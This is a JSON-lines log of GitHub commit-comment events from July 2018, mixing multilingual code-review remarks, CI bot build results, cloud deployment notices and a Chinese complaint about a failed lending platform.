{"id":"8031693599","type":"CommitCommentEvent","actor":{"login":"15331335"},"repo":{"name":"TheYelda/AppServer"},"payload":{"comment":{"id":29866602,"position":15,"line":92,"path":"server/app/model/labels.py","commit_id":"cb6bd691d9102b9425119ffb077dd497c1402d91","created_at":"2018-07-28T05:13:45Z","updated_at":"2018-07-28T05:13:45Z","author_association":"CONTRIBUTOR","body":"int"}},"created_at":"2018-07-28T05:13:45Z"}
{"id":"8031695832","type":"CommitCommentEvent","actor":{"login":"jtdaugherty"},"repo":{"name":"glguy/vty"},"payload":{"comment":{"id":29866612,"position":12,"line":524,"path":"src/Graphics/Vty/Output/TerminfoBased.hs","commit_id":"551e1431082b7907eec48c04693def32c5bc746a","created_at":"2018-07-28T05:15:52Z","updated_at":"2018-07-28T05:15:52Z","author_association":"NONE","body":"Huh. Well that certainly seems like a bug."}},"created_at":"2018-07-28T05:15:52Z"}
{"id":"8031696113","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29866613,"position":null,"line":null,"path":null,"commit_id":"4e88cf1b2ac360074efd0d47bf7b59a2bc10571f","created_at":"2018-07-28T05:16:08Z","updated_at":"2018-07-28T05:16:08Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user Zadezter, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ImpladeDeveloped/Implactor/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `53f8f0f8-9225-11e8-8f51-fac83fb24575`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T05:16:08Z"}
{"id":"8031698801","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ParadoxalCorp/Shoukaku"},"payload":{"comment":{"id":29866623,"position":null,"line":null,"path":null,"commit_id":"ca5e5548bf0524f19d21da4c4aa65bd9a342641e","created_at":"2018-07-28T05:18:34Z","updated_at":"2018-07-28T05:18:34Z","author_association":"NONE","body":"_sips ☕_"}},"created_at":"2018-07-28T05:18:34Z"}
{"id":"8031699152","type":"CommitCommentEvent","actor":{"login":"myonho"},"repo":{"name":"myonho/team-a-mercari"},"payload":{"comment":{"id":29866624,"position":2,"line":2,"path":"README.md","commit_id":"c86925f02a674bf3fac07889f9aba4c0bc8c7e85","created_at":"2018-07-28T05:18:52Z","updated_at":"2018-07-28T05:18:52Z","author_association":"OWNER","body":"都道府県テーブルはメインじゃないので下の方に持ってった方がいいと思います。"}},"created_at":"2018-07-28T05:18:52Z"}
{"id":"8031700809","type":"CommitCommentEvent","actor":{"login":"minoshina"},"repo":{"name":"shin-cyoutec/it_study_okinawa_HP"},"payload":{"comment":{"id":29866628,"position":null,"line":null,"path":null,"commit_id":"70c3ed286eb3899097670dc666afbd24d1cb5d3d","created_at":"2018-07-28T05:20:26Z","updated_at":"2018-07-28T05:20:26Z","author_association":"COLLABORATOR","body":"マージお願いします"}},"created_at":"2018-07-28T05:20:26Z"}
{"id":"8031700935","type":"CommitCommentEvent","actor":{"login":"yzqiu0"},"repo":{"name":"yzqiu0/RightClickOpen"},"payload":{"comment":{"id":29866629,"position":null,"line":null,"path":null,"commit_id":"2bc519ec4e62e537e37cbe30ab122e2bc3e82076","created_at":"2018-07-28T05:20:33Z","updated_at":"2018-07-28T05:20:33Z","author_association":"OWNER","body":"Add recognition of \"file name\", and now it can work in view without a name."}},"created_at":"2018-07-28T05:20:33Z"}
{"id":"8031701242","type":"CommitCommentEvent","actor":{"login":"anshukr96"},"repo":{"name":"anshukr96/pol_blog"},"payload":{"comment":{"id":29866630,"position":null,"line":null,"path":null,"commit_id":"9e1a035dda6990bcb4ff4bda0485e7c630c6ba15","created_at":"2018-07-28T05:20:49Z","updated_at":"2018-07-28T05:20:49Z","author_association":"OWNER","body":"crispy form fixed"}},"created_at":"2018-07-28T05:20:49Z"}
{"id":"8031701661","type":"CommitCommentEvent","actor":{"login":"myonho"},"repo":{"name":"myonho/team-a-mercari"},"payload":{"comment":{"id":29866633,"position":28,"line":15,"path":"README.md","commit_id":"c86925f02a674bf3fac07889f9aba4c0bc8c7e85","created_at":"2018-07-28T05:21:12Z","updated_at":"2018-07-28T05:21:12Z","author_association":"OWNER","body":"index張ってた方が検索速度速くなると思います"}},"created_at":"2018-07-28T05:21:12Z"}
{"id":"8031701701","type":"CommitCommentEvent","actor":{"login":"mooreryan"},"repo":{"name":"mooreryan/VirHostMatcher"},"payload":{"comment":{"id":29866634,"position":23,"line":1249,"path":"computeMeasure_onlyd2star.cpp","commit_id":"830437a1ae3ec46920da7adb7facdf447c6af8f1","created_at":"2018-07-28T05:21:14Z","updated_at":"2018-07-28T05:21:14Z","author_association":"OWNER","body":"WillnerDiNGS() only gets called in cases where k > 4 (see line 1665), but added in the default case anyway."}},"created_at":"2018-07-28T05:21:14Z"}
{"id":"8031702735","type":"CommitCommentEvent","actor":{"login":"myonho"},"repo":{"name":"myonho/team-a-mercari"},"payload":{"comment":{"id":29866635,"position":29,"line":16,"path":"README.md","commit_id":"c86925f02a674bf3fac07889f9aba4c0bc8c7e85","created_at":"2018-07-28T05:22:10Z","updated_at":"2018-07-28T05:22:10Z","author_association":"OWNER","body":"productsテーブルの内容は、mercariの使用上全て必須入力欄になっているので　null: false必須と思います。"}},"created_at":"2018-07-28T05:22:10Z"}
{"id":"8031702740","type":"CommitCommentEvent","actor":{"login":"h39"},"repo":{"name":"h39/q"},"payload":{"comment":{"id":29866636,"position":null,"line":null,"path":null,"commit_id":"46864c0d533e1aefab9e5f442246be3d4e8e6889","created_at":"2018-07-28T05:22:10Z","updated_at":"2018-07-28T05:22:10Z","author_association":"OWNER","body":"我们相信：互联网金融绝不是法外之地！我们更加相信：美丽的浙江绝不是骗子和老赖的天堂！但浙江嘉远微银科技有限公司在网页和手机APP上又是晒执照、又是亮获奖……打着合规经营的幌子，暗地里频繁更换法人和股东，用投放假标、以高息、红包引诱等诈骗手段，疯狂圈钱！致使其平台37万人被骗超亿元！我本人是普通工薪阶层，上班二十多年的积蓄xx多万元几乎全部转入微银平台帐号成为出借人。8月16日，微银平台发布了逾期停盘公告；8月17日，微银平台又单方面发布所谓的良性清盘公告。现在，微银平台早已人去楼空，广大出借人一直积极报案，但当地公安部门口头说已立案，却看不到正式的立案通知书，更不知道嫌疑人是否已得到控制；金融主管部门也迟迟未介入。眼下，我家里老人看病急需钱、孩子上学急需钱……简直逼得人活不下去了！请XXX为我们作主：嘉远微银什么时候还我们的活命钱？谁来救救我们这些被嘉远微银骗得倾家荡产、近乎绝望的老百姓？"}},"created_at":"2018-07-28T05:22:10Z"}
{"id":"8031712108","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866662,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-28T05:30:44Z","updated_at":"2018-07-28T05:30:44Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T05:30:44Z"}
{"id":"8031714544","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29866666,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T05:33:00Z","updated_at":"2018-07-28T05:33:00Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - Win64-Windows-7-VisualStudio-14: OK (2924 of 2924 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T05:33:00Z"}
{"id":"8031714584","type":"CommitCommentEvent","actor":{"login":"tneba"},"repo":{"name":"elmas3/pull-request-practice"},"payload":{"comment":{"id":29866667,"position":null,"line":null,"path":null,"commit_id":"83f49c5e291ac050b435c2f0a93ec3fee14e7811","created_at":"2018-07-28T05:33:03Z","updated_at":"2018-07-28T05:33:03Z","author_association":"NONE","body":"自分用のテキストファイルを追加してみました。\r\n問題なければ、マージお願いします。"}},"created_at":"2018-07-28T05:33:03Z"}
{"id":"8031714848","type":"CommitCommentEvent","actor":{"login":"dnddnjs"},"repo":{"name":"reinforcement-learning-kr/minecraft"},"payload":{"comment":{"id":29866668,"position":null,"line":null,"path":null,"commit_id":"082458d028f7e660ca921ba1d634facf0ac1f03b","created_at":"2018-07-28T05:33:17Z","updated_at":"2018-07-28T05:33:17Z","author_association":"MEMBER","body":"#4 "}},"created_at":"2018-07-28T05:33:17Z"}
{"id":"8031716035","type":"CommitCommentEvent","actor":{"login":"ishaan-malhotra"},"repo":{"name":"ishaan-malhotra/SLKRepo"},"payload":{"comment":{"id":29866669,"position":null,"line":null,"path":null,"commit_id":"d851e87eb7f3251099706808d562a18e18c0dd5e","created_at":"2018-07-28T05:34:18Z","updated_at":"2018-07-28T05:34:18Z","author_association":"OWNER","body":"I made it better :D"}},"created_at":"2018-07-28T05:34:18Z"}
{"id":"8031716602","type":"CommitCommentEvent","actor":{"login":"ndagrawal"},"repo":{"name":"saritwik/AgileInsights"},"payload":{"comment":{"id":29866673,"position":null,"line":null,"path":null,"commit_id":"efb55bff27dcae58fdb456d5f9951bc39e235801","created_at":"2018-07-28T05:34:51Z","updated_at":"2018-07-28T05:34:51Z","author_association":"COLLABORATOR","body":"Please remove this file ! or make the repo private. Token It will still be in history! "}},"created_at":"2018-07-28T05:34:51Z"}
{"id":"8031722138","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29866684,"position":73,"line":27,"path":"course_1/part_3/days.rb","commit_id":"f60c09999c104fc781e846c8a9ac7fb63ec11266","created_at":"2018-07-28T05:40:12Z","updated_at":"2018-07-28T05:40:12Z","author_association":"NONE","body":"название локальной переменной внутри блока не очень удачное, т.к. она своим названием дублирует вненшнюю для блока переменную `month`\r\nпо возможности надо стараться не дублировать названия переменных в рамках одного контекста, это может привести к путаннице"}},"created_at":"2018-07-28T05:40:12Z"}
{"id":"8031723776","type":"CommitCommentEvent","actor":{"login":"k100956"},"repo":{"name":"k100956/cc102"},"payload":{"comment":{"id":29866688,"position":null,"line":null,"path":null,"commit_id":"1c12841561675924f973ac1c50efd43a7cc99c91","created_at":"2018-07-28T05:41:46Z","updated_at":"2018-07-28T05:41:46Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-28T05:41:46Z"}
{"id":"8031726067","type":"CommitCommentEvent","actor":{"login":"emoza"},"repo":{"name":"github/platform-samples"},"payload":{"comment":{"id":29866689,"position":null,"line":null,"path":null,"commit_id":"e89af1883d511a24345d7ebc3f0f2d036b9292bc","created_at":"2018-07-28T05:44:01Z","updated_at":"2018-07-28T05:44:01Z","author_association":"NONE","body":"oh"}},"created_at":"2018-07-28T05:44:01Z"}
{"id":"8031726651","type":"CommitCommentEvent","actor":{"login":"armyshawnlp"},"repo":{"name":"blanco1110/OneSource1.2.8"},"payload":{"comment":{"id":29866690,"position":null,"line":null,"path":null,"commit_id":"47df04df195221e56f93218f223f38897de8baca","created_at":"2018-07-28T05:44:35Z","updated_at":"2018-07-28T05:44:35Z","author_association":"COLLABORATOR","body":"Customer functions as intended. "}},"created_at":"2018-07-28T05:44:35Z"}
{"id":"8031729440","type":"CommitCommentEvent","actor":{"login":"RandolphCYG"},"repo":{"name":"RandolphCYG/Java_learning"},"payload":{"comment":{"id":29866701,"position":null,"line":null,"path":null,"commit_id":"03930cef09bf351d505188013057de927e7245e7","created_at":"2018-07-28T05:47:16Z","updated_at":"2018-07-28T05:47:16Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-28T05:47:16Z"}
{"id":"8031729703","type":"CommitCommentEvent","actor":{"login":"RandolphCYG"},"repo":{"name":"RandolphCYG/Java_learning"},"payload":{"comment":{"id":29866702,"position":null,"line":null,"path":null,"commit_id":"03930cef09bf351d505188013057de927e7245e7","created_at":"2018-07-28T05:47:31Z","updated_at":"2018-07-28T05:47:31Z","author_association":"OWNER","body":"https://github.com/RandolphCYG/Java_learning/commit/03930cef09bf351d505188013057de927e7245e7?diff=split#diff-838602a7cf1f25eb2c26c0c960e902b7"}},"created_at":"2018-07-28T05:47:31Z"}
{"id":"8031733568","type":"CommitCommentEvent","actor":{"login":"RafaelArriaga"},"repo":{"name":"RafaelArriaga/Hello-World"},"payload":{"comment":{"id":29866711,"position":6,"line":4,"path":"README.md","commit_id":"4f2aad17b9bf588a3cb3cfb1058d15d34ed40766","created_at":"2018-07-28T05:51:11Z","updated_at":"2018-07-28T05:51:11Z","author_association":"OWNER","body":"i do like this line in the commit"}},"created_at":"2018-07-28T05:51:11Z"}
{"id":"8031734286","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29866713,"position":null,"line":null,"path":null,"commit_id":"7adfff02e91c8c4a32ff66118eafbc38d1950918","created_at":"2018-07-28T05:51:52Z","updated_at":"2018-07-28T05:51:52Z","author_association":"OWNER","body":"@dmarcoux I tried to make a release but the build fails due to a packagecore issue. We'll have to wait till it gets fixed."}},"created_at":"2018-07-28T05:51:52Z"}
{"id":"8031734576","type":"CommitCommentEvent","actor":{"login":"drudesign"},"repo":{"name":"roundcube/roundcubemail"},"payload":{"comment":{"id":29866714,"position":null,"line":null,"path":null,"commit_id":"0c9494cede65ba7ebc35e91d065c6e2b8a9fac11","created_at":"2018-07-28T05:52:07Z","updated_at":"2018-07-28T05:52:07Z","author_association":"NONE","body":"Hello @thomascube , I believe this version works better:\r\n[logo_notypo.pdf](https://github.com/roundcube/roundcubemail/files/2237712/logo_notypo.pdf)\r\n"}},"created_at":"2018-07-28T05:52:07Z"}
{"id":"8031738116","type":"CommitCommentEvent","actor":{"login":"dxxtwj"},"repo":{"name":"dxxtwj/ceShi"},"payload":{"comment":{"id":29866724,"position":null,"line":null,"path":null,"commit_id":"acc922074f55709073e8b9a5ecf180595787d160","created_at":"2018-07-28T05:55:24Z","updated_at":"2018-07-28T05:55:24Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-28T05:55:24Z"}
{"id":"8031742198","type":"CommitCommentEvent","actor":{"login":"zchee"},"repo":{"name":"kovidgoyal/kitty"},"payload":{"comment":{"id":29866737,"position":6,"line":800,"path":"kitty/parser.c","commit_id":"3df78de3f80d666fca73c6e891a8eff74ab2a9c5","created_at":"2018-07-28T05:59:30Z","updated_at":"2018-07-28T05:59:30Z","author_association":"CONTRIBUTOR","body":"sorry "}},"created_at":"2018-07-28T05:59:30Z"}
{"id":"8031742293","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29866738,"position":null,"line":null,"path":null,"commit_id":"7c1a852004b7c1a5aaaf42bb5f1376c927256308","created_at":"2018-07-28T05:59:35Z","updated_at":"2018-07-28T05:59:35Z","author_association":"CONTRIBUTOR","body":"Two things I must discuss about this:\r\n- First of all, the Move class and its subsequent ArrayList in Battle was the only system of keeping track of move effects. If we're going to cut out Move, we need to have something in place of these systems.\r\n- Second, the getHitboxes() method is currently a stub for the AI interface, something Michael can load in."}},"created_at":"2018-07-28T05:59:35Z"}
{"id":"8031745441","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29866768,"position":null,"line":null,"path":null,"commit_id":"2eb90f60533747d17f55909980296785b03cb0d9","created_at":"2018-07-28T06:01:33Z","updated_at":"2018-07-28T06:01:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1028](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1028).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1028-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-28T06:01:33Z"}
{"id":"8031745738","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29866769,"position":null,"line":null,"path":null,"commit_id":"72b786c60c0da6fc70aa3444e68f5982d54f9703","created_at":"2018-07-28T06:01:52Z","updated_at":"2018-07-28T06:01:52Z","author_association":"CONTRIBUTOR","body":"hee hee, sorry\r\nI just wanted to make sure they weren't sleeping, since the rect rectangle borders weren't moving"}},"created_at":"2018-07-28T06:01:52Z"}
{"id":"8031746703","type":"CommitCommentEvent","actor":{"login":"RabbitG29"},"repo":{"name":"Agrajak/INHAICESA_FRONTEND"},"payload":{"comment":{"id":29866770,"position":null,"line":null,"path":null,"commit_id":"1c5c03312667226231a1ef686b5c83b4671a7900","created_at":"2018-07-28T06:02:46Z","updated_at":"2018-07-28T06:02:46Z","author_association":"COLLABORATOR","body":"머지 안되다가 됫는데 서버를 고쳤었나"}},"created_at":"2018-07-28T06:02:46Z"}
{"id":"8031753231","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29866784,"position":11,"line":16,"path":"course_1/part_3/months_and_days.rb","commit_id":"f60c09999c104fc781e846c8a9ac7fb63ec11266","created_at":"2018-07-28T06:09:04Z","updated_at":"2018-07-28T06:09:04Z","author_association":"NONE","body":"ТЗ: \"Сделать хеш, содеращий месяцы и количество дней в месяце. В цикле выводить те месяцы, у которых количество дней ровно 30\"\r\nу тебя же реализация другая\r\nвывод происходит один раз, выводится на печать коллекция\r\nпредыдущая реализация вывода была более верная (строки 20 - 22), но не надо было разносить на 2 блока\r\nздесь правильней просто перебирать все месяцы и делать вывод по условию\r\nтакое решение будет более соответствующим ТЗ"}},"created_at":"2018-07-28T06:09:04Z"}
{"id":"8031753427","type":"CommitCommentEvent","actor":{"login":"sol"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":29866786,"position":12,"line":89,"path":"Cabal/Distribution/Simple/Program/Builtin.hs","commit_id":"435fd96e264503d05656a470f49a5dd16d00b920","created_at":"2018-07-28T06:09:14Z","updated_at":"2018-07-28T06:09:14Z","author_association":"MEMBER","body":"@angerman I think this also changed the semantics of the `build-tools` field.  Was that by intention?"}},"created_at":"2018-07-28T06:09:14Z"}
{"id":"8031756612","type":"CommitCommentEvent","actor":{"login":"flybikeGx"},"repo":{"name":"iost-official/Go-IOS-Protocol"},"payload":{"comment":{"id":29866790,"position":null,"line":null,"path":null,"commit_id":"8c99bb1592b8b32116066e2ce1303a91316219bf","created_at":"2018-07-28T06:11:57Z","updated_at":"2018-07-28T06:11:57Z","author_association":"CONTRIBUTOR","body":"#7 "}},"created_at":"2018-07-28T06:11:57Z"}
{"id":"8031756771","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29866791,"position":11,"line":6,"path":"course_1/part_3/vowels.rb","commit_id":"f60c09999c104fc781e846c8a9ac7fb63ec11266","created_at":"2018-07-28T06:12:05Z","updated_at":"2018-07-28T06:12:05Z","author_association":"NONE","body":"ТЗ: \"порядковый номер буквы в алфавите (a - 1).\"\r\nу тебя же букве соответствует не номер, а индекс (индекс начинается с 0, а по заданию нумерация должна начинаться с 1)"}},"created_at":"2018-07-28T06:12:05Z"}
{"id":"8031757254","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29866794,"position":11,"line":6,"path":"course_1/part_3/vowels.rb","commit_id":"f60c09999c104fc781e846c8a9ac7fb63ec11266","created_at":"2018-07-28T06:12:32Z","updated_at":"2018-07-28T06:12:32Z","author_association":"NONE","body":"возможно здесь тоже стоит восопльзоваться постфиксным \"иф\""}},"created_at":"2018-07-28T06:12:32Z"}
{"id":"8031757933","type":"CommitCommentEvent","actor":{"login":"madafakaoficial"},"repo":{"name":"madafakaoficial/prueba"},"payload":{"comment":{"id":29866796,"position":null,"line":null,"path":null,"commit_id":"4fa2b15a0781f68801f8dfa75c98fe4987c4a2e8","created_at":"2018-07-28T06:13:13Z","updated_at":"2018-07-28T06:13:13Z","author_association":"OWNER","body":"ta malo"}},"created_at":"2018-07-28T06:13:13Z"}
{"id":"8031761968","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866814,"position":null,"line":null,"path":null,"commit_id":"00fd0431b8b543685333a2c6246e128d42293ef1","created_at":"2018-07-28T06:16:48Z","updated_at":"2018-07-28T06:16:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-061647 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-061647\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:16:48Z"}
{"id":"8031762320","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866815,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-28T06:17:07Z","updated_at":"2018-07-28T06:17:07Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2700 of 2700 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-28T06:17:07Z"}
{"id":"8031764474","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866835,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T06:19:15Z","updated_at":"2018-07-28T06:19:15Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2951 of 2951 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T06:19:15Z"}
{"id":"8031766304","type":"CommitCommentEvent","actor":{"login":"angerman"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":29866837,"position":12,"line":89,"path":"Cabal/Distribution/Simple/Program/Builtin.hs","commit_id":"435fd96e264503d05656a470f49a5dd16d00b920","created_at":"2018-07-28T06:21:01Z","updated_at":"2018-07-28T06:21:01Z","author_association":"COLLABORATOR","body":"Most certainly not."}},"created_at":"2018-07-28T06:21:01Z"}
{"id":"8031766408","type":"CommitCommentEvent","actor":{"login":"jeff-balsacao"},"repo":{"name":"jeff-balsacao/ikonnect2018"},"payload":{"comment":{"id":29866838,"position":null,"line":null,"path":null,"commit_id":"1896b72e39ebe454ddd7db6854b9e578b7e5beab","created_at":"2018-07-28T06:21:07Z","updated_at":"2018-07-28T06:21:07Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/c14ed68e-bb7f-4790-8e34-56f75f18eff3?env_id=ibm%3Ayp%3Aus-south \"ikonnect-potpot-pogi\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/70414112-d996-42a5-ac38-371f8767095f?env_id=ibm%3Ayp%3Aus-south \"ikonnect2018-potpot\") deployed [ikonnect2018](https://github.com/jeff-balsacao/ikonnect2018/releases/tag/deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-062106 \"deploy-ibm-yp-us-south-jeff.balsacao-ph.ibm.com-ikonnect2018-potpot-20180728-062106\") to [ikonnect2018-potpot](https://console.bluemix.net/apps/7fd26144-2686-4134-a1fe-a8581daecae9?env_id=ibm:yp:us-south \"ibm:yp:us-south:jeff.balsacao@ph.ibm.com:ikonnect2018-potpot\"), including this commit"}},"created_at":"2018-07-28T06:21:07Z"}
{"id":"8031766718","type":"CommitCommentEvent","actor":{"login":"antiadp"},"repo":{"name":"soundcheq/chickenheads"},"payload":{"comment":{"id":29866839,"position":null,"line":null,"path":null,"commit_id":"02c8b897521d032f2125193ee0a31eadd9e8e2af","created_at":"2018-07-28T06:21:25Z","updated_at":"2018-07-28T06:21:25Z","author_association":"CONTRIBUTOR","body":"well HELLLLLLOOOOO gorgeous"}},"created_at":"2018-07-28T06:21:25Z"}
{"id":"8031775155","type":"CommitCommentEvent","actor":{"login":"alvinvargas"},"repo":{"name":"alvinvargas/iKonnect2018"},"payload":{"comment":{"id":29866880,"position":null,"line":null,"path":null,"commit_id":"40cba7f08cb08558e86ee3d0ebea3e9843868fb4","created_at":"2018-07-28T06:29:29Z","updated_at":"2018-07-28T06:29:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/748be84d-b5cd-4247-baaa-a6b1c58d9bd7?env_id=ibm%3Ayp%3Aus-south \"iKonnect-Bino\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/a1024e66-ec73-48c0-a47e-077a4e5e6031?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-Bino\") deployed [iKonnect2018](https://github.com/alvinvargas/iKonnect2018/releases/tag/deploy-ibm-yp-eu-gb-vargasa-test-20180728-062929 \"deploy-ibm-yp-eu-gb-vargasa-test-20180728-062929\") to [test](https://console.bluemix.net/apps/76f03407-4884-4fa7-a941-dde3a9927f79?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:vargasa:test\"), including this commit"}},"created_at":"2018-07-28T06:29:29Z"}
